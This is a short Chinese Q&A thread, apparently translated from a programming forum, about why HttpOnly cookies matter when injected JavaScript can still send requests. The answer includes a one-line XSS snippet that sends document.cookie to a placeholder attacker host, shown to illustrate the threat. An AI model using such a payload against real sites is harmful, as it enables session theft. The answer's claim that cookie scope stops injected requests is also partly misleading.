1

据我了解,客户端 js 无法读取 HttpOnly cookie,但它们由浏览器与任何后续请求一起传递。

如果攻击者能够将 js 注入网页并向端点发出请求,它仍然会通过,因为所有 cookie 都会传递,对吗?

HttpOnly cookie 的意义何在?

4

1 回答 1

0

如果攻击者能够将 js 注入网页并向端点发出请求,它仍然会通过,因为所有 cookie 都会传递,对吗?

不会。Domain 和 Path 属性定义了 cookie 的范围:cookie 应该发送到哪些 URL。

在此处查看“定义 cookie 的发送位置”部分。

但是如果没有 HttpOnly,攻击者可以使用 js 访问 cookie 值:

<script> document.location=”http://Attacker’sIP/cookiestealer.php?c=”document.cookie; </script>
于 2020-10-22T06:41:51.123 回答